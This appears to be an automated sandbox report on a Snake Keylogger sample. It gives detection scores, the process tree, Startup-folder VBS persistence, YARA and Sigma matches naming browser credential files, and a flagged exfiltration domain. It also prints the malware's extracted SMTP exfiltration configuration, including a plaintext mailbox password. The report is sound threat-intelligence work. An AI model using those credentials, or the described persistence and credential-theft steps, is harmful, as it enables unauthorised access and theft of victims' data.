Edit tour

Windows Analysis Report
PsBygexGwH.exe

Overview

General Information

Sample name:	PsBygexGwH.exe renamed because original name is a hash value
Original sample name:	f36cebf205cb95b23bea11f15356461b51b40cd0bd586e5c5f151a6396a6151a.exe
Analysis ID:	1422242
MD5:	222d05295014f8974d6e358e1507770e
SHA1:	d1475a87d8aad1852eda1ac93ebb0bbbb1f08e0b
SHA256:	f36cebf205cb95b23bea11f15356461b51b40cd0bd586e5c5f151a6396a6151a
Tags:	exe
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected Snake Keylogger

Binary is likely a compiled AutoIt script file

Drops VBS files to the startup folder

Found API chain indicative of sandbox detection

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Potentially malicious time measurement code found

Sigma detected: WScript or CScript Dropper

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Yara detected Generic Downloader

Abnormal high CPU Usage

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Tries to load missing DLLs

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

PsBygexGwH.exe (PID: 6516 cmdline: "C:\Users\user\Desktop\PsBygexGwH.exe" MD5: 222D05295014F8974D6E358E1507770E)

name.exe (PID: 3052 cmdline: "C:\Users\user\Desktop\PsBygexGwH.exe" MD5: 90D7DF3194AF25C7942DCDB56E8902F3)

RegSvcs.exe (PID: 5444 cmdline: "C:\Users\user\Desktop\PsBygexGwH.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

wscript.exe (PID: 1908 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

name.exe (PID: 4556 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 90D7DF3194AF25C7942DCDB56E8902F3)

RegSvcs.exe (PID: 3844 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "contabilidad@daipro.com.mx", "Password": "DAIpro123**", "Host": "mail.daipro.com.mx", "Port": "587"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a08:$a1: get_encryptedPassword 0x14cfe:$a2: get_encryptedUsername 0x14814:$a3: get_timePasswordChanged 0x1490f:$a4: get_passwordField 0x14a1e:$a5: set_encryptedPassword 0x1604a:$a7: get_logins 0x15fad:$a10: KeyLoggerEventArgs 0x15c46:$a11: KeyLoggerEventArgsEventHandler
00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c2ef:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b521:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b954:$a4: \Orbitum\User Data\Default\Login Data 0x1c993:$a5: \Kometa\User Data\Default\Login Data
00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1558a:$s1: UnHook 0x15591:$s2: SetHook 0x15599:$s3: CallNextHook 0x155a6:$s4: _hook
00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18304:$x1: $%SMTPDV$ 0x18368:$x2: $#TheHashHere%& 0x199eb:$x3: %FTPDV$ 0x19adf:$x4: $%TelegramDv$ 0x15c46:$x5: KeyLoggerEventArgs 0x15fad:$x5: KeyLoggerEventArgs 0x19a0f:$m2: Clipboard Logs ID 0x19bdb:$m2: Screenshot Logs ID 0x19ca7:$m2: keystroke Logs ID 0x19bb3:$m4: \SnakeKeylogger\
00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1104:$x1: $%SMTPDV$ 0x1168:$x2: $#TheHashHere%& 0x27eb:$x3: %FTPDV$ 0x28df:$x4: $%TelegramDv$ 0x280f:$m2: Clipboard Logs ID 0x29db:$m2: Screenshot Logs ID 0x2aa7:$m2: keystroke Logs ID 0x29b3:$m4: \SnakeKeylogger\
0000000A.00000002.4089048869.0000000002801000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a08:$a1: get_encryptedPassword 0x14cfe:$a2: get_encryptedUsername 0x14814:$a3: get_timePasswordChanged 0x1490f:$a4: get_passwordField 0x14a1e:$a5: set_encryptedPassword 0x1604a:$a7: get_logins 0x15fad:$a10: KeyLoggerEventArgs 0x15c46:$a11: KeyLoggerEventArgsEventHandler
00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c2ef:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b521:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b954:$a4: \Orbitum\User Data\Default\Login Data 0x1c993:$a5: \Kometa\User Data\Default\Login Data
00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1558a:$s1: UnHook 0x15591:$s2: SetHook 0x15599:$s3: CallNextHook 0x155a6:$s4: _hook
00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18304:$x1: $%SMTPDV$ 0x18368:$x2: $#TheHashHere%& 0x199eb:$x3: %FTPDV$ 0x19adf:$x4: $%TelegramDv$ 0x15c46:$x5: KeyLoggerEventArgs 0x15fad:$x5: KeyLoggerEventArgs 0x19a0f:$m2: Clipboard Logs ID 0x19bdb:$m2: Screenshot Logs ID 0x19ca7:$m2: keystroke Logs ID 0x19bb3:$m4: \SnakeKeylogger\
00000007.00000002.4088699250.0000000002551000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: name.exe PID: 3052	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: name.exe PID: 3052	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: name.exe PID: 3052	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3fc11:$a1: get_encryptedPassword 0x3fefd:$a2: get_encryptedUsername 0x3fa27:$a3: get_timePasswordChanged 0x3fb22:$a4: get_passwordField 0x3fc27:$a5: set_encryptedPassword 0x42064:$a7: get_logins 0x41fc7:$a10: KeyLoggerEventArgs 0x41c60:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: name.exe PID: 3052	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x41c60:$x5: KeyLoggerEventArgs 0x41fc7:$x5: KeyLoggerEventArgs 0x428b5:$x5: KeyLoggerEventArgs 0x42be9:$x5: KeyLoggerEventArgs 0x4420d:$m2: Clipboard Logs ID 0x442ed:$m2: Screenshot Logs ID 0x44321:$m2: keystroke Logs ID 0x442d9:$m4: \SnakeKeylogger\
Process Memory Space: RegSvcs.exe PID: 5444	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 5444	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 5444	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x25cb4:$x5: KeyLoggerEventArgs 0x2601b:$x5: KeyLoggerEventArgs 0x26621:$x5: KeyLoggerEventArgs 0x26955:$x5: KeyLoggerEventArgs 0x2ceb4:$m2: Clipboard Logs ID 0x2cf94:$m2: Screenshot Logs ID 0x2cfc8:$m2: keystroke Logs ID 0x2cf80:$m4: \SnakeKeylogger\
Process Memory Space: name.exe PID: 4556	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: name.exe PID: 4556	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: name.exe PID: 4556	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x16f0a0:$a1: get_encryptedPassword 0x16f38c:$a2: get_encryptedUsername 0x16eeb6:$a3: get_timePasswordChanged 0x16efb1:$a4: get_passwordField 0x16f0b6:$a5: set_encryptedPassword 0x1714f3:$a7: get_logins 0x171456:$a10: KeyLoggerEventArgs 0x1710ef:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: name.exe PID: 4556	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1710ef:$x5: KeyLoggerEventArgs 0x171456:$x5: KeyLoggerEventArgs 0x171d44:$x5: KeyLoggerEventArgs 0x172078:$x5: KeyLoggerEventArgs 0x17369c:$m2: Clipboard Logs ID 0x17377c:$m2: Screenshot Logs ID 0x1737b0:$m2: keystroke Logs ID 0x173768:$m4: \SnakeKeylogger\
Process Memory Space: RegSvcs.exe PID: 3844	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 3844	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Click to see the 27 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.name.exe.40c0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.name.exe.40c0000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.name.exe.40c0000.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
9.2.name.exe.40c0000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a08:$a1: get_encryptedPassword 0x14cfe:$a2: get_encryptedUsername 0x14814:$a3: get_timePasswordChanged 0x1490f:$a4: get_passwordField 0x14a1e:$a5: set_encryptedPassword 0x1604a:$a7: get_logins 0x15fad:$a10: KeyLoggerEventArgs 0x15c46:$a11: KeyLoggerEventArgsEventHandler
9.2.name.exe.40c0000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c2ef:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b521:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b954:$a4: \Orbitum\User Data\Default\Login Data 0x1c993:$a5: \Kometa\User Data\Default\Login Data
9.2.name.exe.40c0000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1558a:$s1: UnHook 0x15591:$s2: SetHook 0x15599:$s3: CallNextHook 0x155a6:$s4: _hook
9.2.name.exe.40c0000.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18304:$x1: $%SMTPDV$ 0x18368:$x2: $#TheHashHere%& 0x199eb:$x3: %FTPDV$ 0x19adf:$x4: $%TelegramDv$ 0x15c46:$x5: KeyLoggerEventArgs 0x15fad:$x5: KeyLoggerEventArgs 0x19a0f:$m2: Clipboard Logs ID 0x19bdb:$m2: Screenshot Logs ID 0x19ca7:$m2: keystroke Logs ID 0x19bb3:$m4: \SnakeKeylogger\
6.2.name.exe.3910000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.name.exe.3910000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.2.name.exe.3910000.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
6.2.name.exe.3910000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a08:$a1: get_encryptedPassword 0x14cfe:$a2: get_encryptedUsername 0x14814:$a3: get_timePasswordChanged 0x1490f:$a4: get_passwordField 0x14a1e:$a5: set_encryptedPassword 0x1604a:$a7: get_logins 0x15fad:$a10: KeyLoggerEventArgs 0x15c46:$a11: KeyLoggerEventArgsEventHandler
6.2.name.exe.3910000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c2ef:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b521:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b954:$a4: \Orbitum\User Data\Default\Login Data 0x1c993:$a5: \Kometa\User Data\Default\Login Data
6.2.name.exe.3910000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1558a:$s1: UnHook 0x15591:$s2: SetHook 0x15599:$s3: CallNextHook 0x155a6:$s4: _hook
6.2.name.exe.3910000.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x18304:$x1: $%SMTPDV$ 0x18368:$x2: $#TheHashHere%& 0x199eb:$x3: %FTPDV$ 0x19adf:$x4: $%TelegramDv$ 0x15c46:$x5: KeyLoggerEventArgs 0x15fad:$x5: KeyLoggerEventArgs 0x19a0f:$m2: Clipboard Logs ID 0x19bdb:$m2: Screenshot Logs ID 0x19ca7:$m2: keystroke Logs ID 0x19bb3:$m4: \SnakeKeylogger\
6.2.name.exe.3910000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.name.exe.3910000.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
6.2.name.exe.3910000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c08:$a1: get_encryptedPassword 0x12efe:$a2: get_encryptedUsername 0x12a14:$a3: get_timePasswordChanged 0x12b0f:$a4: get_passwordField 0x12c1e:$a5: set_encryptedPassword 0x1424a:$a7: get_logins 0x141ad:$a10: KeyLoggerEventArgs 0x13e46:$a11: KeyLoggerEventArgsEventHandler
6.2.name.exe.3910000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a4ef:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19721:$a3: \Google\Chrome\User Data\Default\Login Data 0x19b54:$a4: \Orbitum\User Data\Default\Login Data 0x1ab93:$a5: \Kometa\User Data\Default\Login Data
6.2.name.exe.3910000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1378a:$s1: UnHook 0x13791:$s2: SetHook 0x13799:$s3: CallNextHook 0x137a6:$s4: _hook
6.2.name.exe.3910000.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x16504:$x1: $%SMTPDV$ 0x16568:$x2: $#TheHashHere%& 0x17beb:$x3: %FTPDV$ 0x17cdf:$x4: $%TelegramDv$ 0x13e46:$x5: KeyLoggerEventArgs 0x141ad:$x5: KeyLoggerEventArgs 0x17c0f:$m2: Clipboard Logs ID 0x17ddb:$m2: Screenshot Logs ID 0x17ea7:$m2: keystroke Logs ID 0x17db3:$m4: \SnakeKeylogger\
9.2.name.exe.40c0000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.name.exe.40c0000.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
9.2.name.exe.40c0000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c08:$a1: get_encryptedPassword 0x12efe:$a2: get_encryptedUsername 0x12a14:$a3: get_timePasswordChanged 0x12b0f:$a4: get_passwordField 0x12c1e:$a5: set_encryptedPassword 0x1424a:$a7: get_logins 0x141ad:$a10: KeyLoggerEventArgs 0x13e46:$a11: KeyLoggerEventArgsEventHandler
9.2.name.exe.40c0000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a4ef:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x19721:$a3: \Google\Chrome\User Data\Default\Login Data 0x19b54:$a4: \Orbitum\User Data\Default\Login Data 0x1ab93:$a5: \Kometa\User Data\Default\Login Data
9.2.name.exe.40c0000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1378a:$s1: UnHook 0x13791:$s2: SetHook 0x13799:$s3: CallNextHook 0x137a6:$s4: _hook
9.2.name.exe.40c0000.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x16504:$x1: $%SMTPDV$ 0x16568:$x2: $#TheHashHere%& 0x17beb:$x3: %FTPDV$ 0x17cdf:$x4: $%TelegramDv$ 0x13e46:$x5: KeyLoggerEventArgs 0x141ad:$x5: KeyLoggerEventArgs 0x17c0f:$m2: Clipboard Logs ID 0x17ddb:$m2: Screenshot Logs ID 0x17ea7:$m2: keystroke Logs ID 0x17db3:$m4: \SnakeKeylogger\
Click to see the 21 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 1908, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 1908, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\directory\name.exe, ProcessId: 3052, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://scratchdreams.tk	Avira URL Cloud: Label: malware
Source: https://scratchdreams.tk/_send_.php?TS	Avira URL Cloud: Label: malware
Source: http://scratchdreams.tk	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "contabilidad@daipro.com.mx", "Password": "DAIpro123**", "Host": "mail.daipro.com.mx", "Port": "587"}

Multi AV Scanner detection for domain / URL

Source: scratchdreams.tk	Virustotal: Detection: 6%	Perma Link
Source: https://scratchdreams.tk	Virustotal: Detection: 15%	Perma Link
Source: http://scratchdreams.tk	Virustotal: Detection: 6%	Perma Link
Source: https://scratchdreams.tk/_send_.php?TS	Virustotal: Detection: 14%	Perma Link

Multi AV Scanner detection for submitted file

Source: PsBygexGwH.exe	ReversingLabs: Detection: 65%
Source: PsBygexGwH.exe	Virustotal: Detection: 70%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\directory\name.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PsBygexGwH.exe

Joe Sandbox ML: detected

Source: PsBygexGwH.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49738 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49754 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.4:49768 version: TLS 1.2

Source:	Binary string: wntdll.pdbUGP source: name.exe, 00000006.00000003.2997844990.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2997193126.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000009.00000003.3128087132.0000000004290000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000009.00000003.3129130563.0000000004120000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: name.exe, 00000006.00000003.2997844990.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2997193126.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000009.00000003.3128087132.0000000004290000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000009.00000003.3129130563.0000000004120000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_0018DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0018DBBE
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_001968EE FindFirstFileW,FindClose,	0_2_001968EE
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_0019698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0019698F
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_0018D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0018D076
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_0018D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0018D3A9
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_00199642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00199642
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_0019979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0019979D
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_00199B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00199B2B
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_00195C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00195C97
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0032DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	6_2_0032DBBE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_003368EE FindFirstFileW,FindClose,	6_2_003368EE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0033698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	6_2_0033698F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0032D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_0032D076
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0032D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_0032D3A9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00339642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_00339642
